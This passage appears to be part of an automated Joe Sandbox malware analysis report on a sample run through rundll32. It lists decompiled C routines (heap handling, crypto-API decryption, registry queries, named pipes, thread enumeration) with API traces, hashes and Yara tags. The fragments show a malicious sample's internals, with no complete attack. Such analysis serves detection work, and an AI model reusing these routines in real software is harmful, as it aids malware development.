                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B72A98
                                            • Part of subcall function 00B72BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,00B50000), ref: 00B72C64
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                          • String ID:
                                          • API String ID: 123106877-0
                                          • Opcode ID: 58e9ffdbe5183075ae2f9793def5378806201477f8bf9db39a6e16cd1192a92c
                                          • Instruction ID: af13be50d5f738c92f190cea8c90951cd4c82fecfde1b10c70f032b52605140b
                                          • Opcode Fuzzy Hash: 58e9ffdbe5183075ae2f9793def5378806201477f8bf9db39a6e16cd1192a92c
                                          • Instruction Fuzzy Hash: 3FA00196AAD503BD312867526D87D3A029CD5C4FA2770CAEAB46E98591A9C028461031
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B72A98
                                            • Part of subcall function 00B72BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,00B50000), ref: 00B72C64
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                          • String ID:
                                          • API String ID: 123106877-0
                                          • Opcode ID: 817fe9faebf0f797eea134759fa7b2f1f977c4d624fd1f852492149ea3c38f24
                                          • Instruction ID: 2d147381a4f8ed3f68fea97289a794229f9935fafd232fa55ca67d9a56a2497a
                                          • Opcode Fuzzy Hash: 817fe9faebf0f797eea134759fa7b2f1f977c4d624fd1f852492149ea3c38f24
                                          • Instruction Fuzzy Hash: 55A001A6AA96027D3128A7526D87E3A029CD5C0F62770C6EAB46EA8591A9C028461035
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04894C73(void* _a4) {
                                          				char _t2;
                                          
                                          				_t2 = RtlFreeHeap( *0x489a2d8, 0, _a4); // executed
                                          				return _t2;
                                          			}

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: da7b015c0176d925f02c539519712af401712064357b1cc147a9333a4b32093e
                                          • Instruction ID: 5b053899348031f1cfb9fb84def0cd507fc5a707131485c746e3429b7899d916
                                          • Opcode Fuzzy Hash: da7b015c0176d925f02c539519712af401712064357b1cc147a9333a4b32093e
                                          • Instruction Fuzzy Hash: 84B012B1300600FBCB255B40DE04F057A21E754700F044814F304000708A760C20FB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04894DF6(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x489a2d8, 0, _a4); // executed
                                          				return _t2;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0e734f7147582c778d49e6ca4f77b06a09c3720793c8b382cee1ad430ce9da4d
                                          • Instruction ID: c5915ca4b63cd211e1f744c21fdce307086262b411a6e26ec5801facc9e6d5ba
                                          • Opcode Fuzzy Hash: 0e734f7147582c778d49e6ca4f77b06a09c3720793c8b382cee1ad430ce9da4d
                                          • Instruction Fuzzy Hash: 10B01271100600BBDA055B40DD09F057B21F750700F044814F205400708A770C60FB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c2f65416e1e434524ecce10a6342acc2950d3495e615cf979aae7c855b8f19cf
                                          • Instruction ID: a67eb43a32a66a9bf39c865a67c351fbd5f4fd73a35803ed2f98ac3fbd543482
                                          • Opcode Fuzzy Hash: c2f65416e1e434524ecce10a6342acc2950d3495e615cf979aae7c855b8f19cf
                                          • Instruction Fuzzy Hash: 16B01271140100ABDE014B10EE04F057A21A750701F004411F30D420708B3104A0EB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 4f7a5fbd6063e34d11a650e28706c62fba0cb0730bf356320a65af3575b9eb66
                                          • Instruction ID: 57c1c1fcaba41f99cc493cb46ec409ab4213a50189d91668af23d5beee2b476d
                                          • Opcode Fuzzy Hash: 4f7a5fbd6063e34d11a650e28706c62fba0cb0730bf356320a65af3575b9eb66
                                          • Instruction Fuzzy Hash: 9CB01236000100ABDE014B10ED04F057B21A750701F014811F30D820708B3104E4EB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E048917E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                          				void* _v8;
                                          				int _v12;
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				char _v144;
                                          				int _v148;
                                          				intOrPtr _v152;
                                          				intOrPtr _v156;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				void* _t37;
                                          				void* _t42;
                                          				void* _t51;
                                          				int _t53;
                                          				void* _t60;
                                          				void* _t63;
                                          				void* _t64;
                                          
                                          				_t53 = 0;
                                          				_t60 = __ecx;
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                          					L21:
                                          					return _t53;
                                          				} else {
                                          					_t58 =  &_v164;
                                          					_t37 = E04892F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                          					if(_t37 != 0) {
                                          						goto L21;
                                          					}
                                          					_t61 = _t60 - 0x80;
                                          					if(_v148 > _t60 - 0x80) {
                                          						goto L21;
                                          					}
                                          					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                          						_t37 = _t37 + 1;
                                          						if(_t37 < 0x10) {
                                          							continue;
                                          						}
                                          						_t53 = _v148;
                                          						_t51 = E04894DF6(_t53);
                                          						_v8 = _t51;
                                          						_t73 = _t51;
                                          						if(_t51 != 0) {
                                          							_t53 = 0;
                                          							L18:
                                          							if(_t53 != 0) {
                                          								goto L21;
                                          							}
                                          							L19:
                                          							if(_v8 != 0) {
                                          								E04894C73(_v8);
                                          							}
                                          							goto L21;
                                          						}
                                          						memcpy(_t51, _a4, _t53);
                                          						L8:
                                          						_t63 = _v8;
                                          						E0489679A(_t58, _t73, _t63, _t53,  &_v32);
                                          						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                          							L15:
                                          							_t53 = 0;
                                          							goto L19;
                                          						} else {
                                          							 *_a8 = _t63;
                                          							goto L18;
                                          						}
                                          					}
                                          					_t58 =  &_v144;
                                          					_t42 = E04893072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                          					__eflags = _t42;
                                          					if(_t42 != 0) {
                                          						_t53 = _v12;
                                          						goto L18;
                                          					}
                                          					_t53 = _v148;
                                          					__eflags = _v12 - _t53;
                                          					if(__eflags >= 0) {
                                          						goto L8;
                                          					}
                                          					goto L15;
                                          				}
                                          			}
                                          0x048917f0
                                          0x048917f3
                                          0x048917fa
                                          0x048917fd
                                          0x04891800
                                          0x04891805
                                          0x04891901
                                          0x04891905
                                          0x04891817
                                          0x04891823
                                          0x0489182a
                                          0x04891831
                                          0x00000000
                                          0x00000000
                                          0x04891837
                                          0x0489183f
                                          0x00000000
                                          0x00000000
                                          0x04891845
                                          0x0489184e
                                          0x04891852
                                          0x00000000
                                          0x00000000
                                          0x04891854
                                          0x0489185b
                                          0x04891860
                                          0x04891863
                                          0x04891865
                                          0x048918e6
                                          0x048918ed
                                          0x048918ef
                                          0x00000000
                                          0x00000000
                                          0x048918f1
                                          0x048918f5
                                          0x048918fa
                                          0x048918fa
                                          0x00000000
                                          0x048918f5
                                          0x0489186c
                                          0x04891874
                                          0x04891874
                                          0x0489187d
                                          0x0489188b
                                          0x048918e2
                                          0x048918e2
                                          0x00000000
                                          0x048918ae
                                          0x048918b1
                                          0x00000000
                                          0x048918b1
                                          0x0489188b
                                          0x048918c0
                                          0x048918ce
                                          0x048918d3
                                          0x048918d5
                                          0x048918ea
                                          0x00000000
                                          0x048918ea
                                          0x048918d7
                                          0x048918dd
                                          0x048918e0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048918e0

                                          APIs
                                          • memcpy.NTDLL(00000000,?,?,?,?,048958B7,00000001,?,?,048958B7), ref: 0489186C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                          • Instruction ID: f38058c0e8c49f06cc42df3e63c91e3d83452e2482ef809d158e3ba8ff392530
                                          • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                          • Instruction Fuzzy Hash: D9312171E0461AEFFF11EE98C884AADB7F5BB04208F184AA9E515F7140D770AE45FB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,00B67C87,00000000,?,00B67C87,00000000,00000001,00000000,76D84D40,?,?,?,00B67C87,00000000), ref: 00B6A148
                                            • Part of subcall function 00B6C051: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,00B63796,00000000,00000001,-00000007,?,00000000), ref: 00B6C074
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                          • String ID:
                                          • API String ID: 1301464996-0
                                          • Opcode ID: 765faacff86edbfd15fda3b0d7d05d1bfc450c07f010629666a82807a9060afc
                                          • Instruction ID: 6b2895eed44ad5c87c5b8126fea9f369de4ae9baed42e71efb34d81dbf37488b
                                          • Opcode Fuzzy Hash: 765faacff86edbfd15fda3b0d7d05d1bfc450c07f010629666a82807a9060afc
                                          • Instruction Fuzzy Hash: 45119E76610201AFDF14EF48DC81EA977E9EB4B310F1000A9FA06BB291DB789D409F11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memcpy.NTDLL(?,00B79344,00000018,00B5D1A4,06148E36,?,00B5D1A4,06148E36,?,00B5D1A4,06148E36,?,?,?,?,00B5D1A4), ref: 00B55318
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 613e5d7ce294fc27f4408ca9a1bd7eee3b7397a6c7c3e277e6c07f4027170921
                                          • Instruction ID: e0e832c97c2af2f2d968cc79083444e3e89061bf99d9e4a3cd6d8db4878b3bd0
                                          • Opcode Fuzzy Hash: 613e5d7ce294fc27f4408ca9a1bd7eee3b7397a6c7c3e277e6c07f4027170921
                                          • Instruction Fuzzy Hash: 11116331610509AFDB24DF55EC49DB637E5FB8531170B40A6B90D8B2B1DF316D88CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B5603A
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                            • Part of subcall function 00B55DA0: CloseHandle.KERNEL32(?), ref: 00B55DC6
                                            • Part of subcall function 00B55DA0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B55DD2
                                            • Part of subcall function 00B55DA0: GetModuleHandleA.KERNEL32(?,0614978E), ref: 00B55DF2
                                            • Part of subcall function 00B55DA0: GetProcAddress.KERNEL32(00000000), ref: 00B55DF9
                                            • Part of subcall function 00B55DA0: Thread32First.KERNEL32(?,0000001C), ref: 00B55E09
                                            • Part of subcall function 00B55DA0: CloseHandle.KERNEL32(?), ref: 00B55E51
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                          • String ID:
                                          • API String ID: 2627809124-0
                                          • Opcode ID: 2fedf65652993fbf56d2421523c276df8c4b6b22dc9ddc54d4fe8440bd9024d3
                                          • Instruction ID: c8644ce694238ab1c81c2a750a58212a9207e946df3a8850e76ca6aef216bb63
                                          • Opcode Fuzzy Hash: 2fedf65652993fbf56d2421523c276df8c4b6b22dc9ddc54d4fe8440bd9024d3
                                          • Instruction Fuzzy Hash: 29018F72610109BF8B25EBA9DD89D9FB7FCEF0534674000E9F805A3191DA31AE44CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00B634FE,00B69CDB,00000000,00000000), ref: 00B656F4
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                            • Part of subcall function 00B53622: lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                            • Part of subcall function 00B53622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                            • Part of subcall function 00B53622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                            • Part of subcall function 00B53622: GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                            • Part of subcall function 00B53622: HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                          • String ID:
                                          • API String ID: 730886825-0
                                          • Opcode ID: 2ecd59795ad88bd7c01b9eb447395168ce43fc4b77305f5d6da02f266f074d2e
                                          • Instruction ID: 0056942bd65d1f227b595a009ae1432a12ca41549205676ef73995da8eab2131
                                          • Opcode Fuzzy Hash: 2ecd59795ad88bd7c01b9eb447395168ce43fc4b77305f5d6da02f266f074d2e
                                          • Instruction Fuzzy Hash: 53017C31610205BBDB21D799DD4AF9F7BECEF05750F500099FA09A31E0DA74AE84CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B66BF8
                                            • Part of subcall function 00B5A3BD: memset.NTDLL ref: 00B5A3E3
                                            • Part of subcall function 00B5A3BD: memcpy.NTDLL ref: 00B5A40B
                                            • Part of subcall function 00B5A3BD: GetLastError.KERNEL32(00000010,00000218,00B7327D,00000100,?,00000318,00000008), ref: 00B5A422
                                            • Part of subcall function 00B5A3BD: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B7327D,00000100), ref: 00B5A505
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 4290293647-0
                                          • Opcode ID: edb86a3c3fc946ce77e6c5985e7340f0a66807dec931a112dcf58ad4e6f00f81
                                          • Instruction ID: bba141b56280a8d3024a656784a5404d83ac0a9b34170b38557cd4e004a183c6
                                          • Opcode Fuzzy Hash: edb86a3c3fc946ce77e6c5985e7340f0a66807dec931a112dcf58ad4e6f00f81
                                          • Instruction Fuzzy Hash: E401FD7064270C6BC7209F29D841B8A7BE8EF44318F0088AAFC84A7242C779E9048AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0489427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                          				void* _t21;
                                          				void* _t22;
                                          				signed int _t24;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          
                                          				_t26 = __edi;
                                          				if(_a4 == 0) {
                                          					L2:
                                          					_t27 = E04894E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                          					if(_t27 == 0) {
                                          						_t24 = _a12 >> 1;
                                          						if(_t24 == 0) {
                                          							_t27 = 2;
                                          							HeapFree( *0x489a2d8, 0, _a4);
                                          						} else {
                                          							_t21 = _a4;
                                          							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                          							 *_t26 = _t21;
                                          						}
                                          					}
                                          					L6:
                                          					return _t27;
                                          				}
                                          				_t22 = E04896D05(_a4, _a8, _a12, __edi); // executed
                                          				_t27 = _t22;
                                          				if(_t27 == 0) {
                                          					goto L6;
                                          				}
                                          				goto L2;
                                          			}
                                          0x0489427e
                                          0x04894286
                                          0x0489429d
                                          0x048942b8
                                          0x048942bc
                                          0x048942c1
                                          0x048942c3
                                          0x048942d5
                                          0x048942e1
                                          0x048942c5
                                          0x048942c5
                                          0x048942ca
                                          0x048942cf
                                          0x048942cf
                                          0x048942c3
                                          0x048942e7
                                          0x048942eb
                                          0x048942eb
                                          0x04894292
                                          0x04894297
                                          0x0489429b
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04896D05: SysFreeString.OLEAUT32(00000000), ref: 04896D68
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76DDF710,?,00000000,?,00000000,?,0489681F,?,004F0053,052493D8,00000000,?), ref: 048942E1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Free$HeapString
                                          • String ID:
                                          • API String ID: 3806048269-0
                                          • Opcode ID: b2bc1cdc9c1752afec489e4ce1bf63716b13350e23241d449a1f32f092782ce1
                                          • Instruction ID: 828207846863616ad22358fb97a0ca3132020df0e0860ca3885b5c1071591014
                                          • Opcode Fuzzy Hash: b2bc1cdc9c1752afec489e4ce1bf63716b13350e23241d449a1f32f092782ce1
                                          • Instruction Fuzzy Hash: 1D014F36504A19BBCF269F94CC04EEA3BA5FF44B50F088918FE199A120D771ED61DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E0489723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                          				void* _t13;
                                          				void* _t21;
                                          
                                          				_t11 =  &_a4;
                                          				_t21 = 0;
                                          				__imp__( &_a8);
                                          				_t13 = E04893072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                          				if(_t13 == 0) {
                                          					_t21 = E04894DF6(_a8 + _a8);
                                          					if(_t21 != 0) {
                                          						E04891908(_a4, _t21, _t23);
                                          					}
                                          					E04894C73(_a4);
                                          				}
                                          				return _t21;
                                          			}
                                          0x04897243
                                          0x0489724a
                                          0x0489724c
                                          0x0489725b
                                          0x04897262
                                          0x04897271
                                          0x04897275
                                          0x0489727c
                                          0x0489727c
                                          0x04897284
                                          0x04897289
                                          0x0489728e

                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,00000000,?,0489379D,00000000,?,?,?,0489653D,?,052495B0), ref: 0489724C
                                            • Part of subcall function 04893072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,048958B7), ref: 048930AA
                                            • Part of subcall function 04893072: memcpy.NTDLL(?,048958B7,00000010,?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90), ref: 048930C3
                                            • Part of subcall function 04893072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 048930EC
                                            • Part of subcall function 04893072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04893104
                                            • Part of subcall function 04893072: memcpy.NTDLL(00000000,04896D90,048958B7,0000011F), ref: 04893156
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                          • String ID:
                                          • API String ID: 894908221-0
                                          • Opcode ID: ec699373c060feec39b9ba1daa27f8670f09c686b85bfd41c6ffec03933f15d2
                                          • Instruction ID: 429550f4d9d2172192c780e0e3983d83a6c35c8604b0451efacc4b14a9096503
                                          • Opcode Fuzzy Hash: ec699373c060feec39b9ba1daa27f8670f09c686b85bfd41c6ffec03933f15d2
                                          • Instruction Fuzzy Hash: 1BF0B436100808BBEF016F59CC00CDB3BEDEF88654B088611FD19CA010DA72EE528BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04893B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                          				void* _t17;
                                          
                                          				if(_a4 == 0) {
                                          					L2:
                                          					return E04893BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                          				}
                                          				_t17 = E048978E7(_a4, _a8, _a12, _a16, _a20); // executed
                                          				if(_t17 != 0) {
                                          					goto L2;
                                          				}
                                          				return _t17;
                                          			}
                                          0x04893b7e
                                          0x04893b98
                                          0x00000000
                                          0x04893bb4
                                          0x04893b8f
                                          0x04893b96
                                          0x00000000
                                          0x00000000
                                          0x04893bbb

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,04896FE9,3D048990,80000002,04892A82,0489744C,74666F53,4D4C4B48,0489744C,?,3D048990,80000002,04892A82,?), ref: 04893B9B
                                            • Part of subcall function 048978E7: SysAllocString.OLEAUT32(0489744C), ref: 04897900
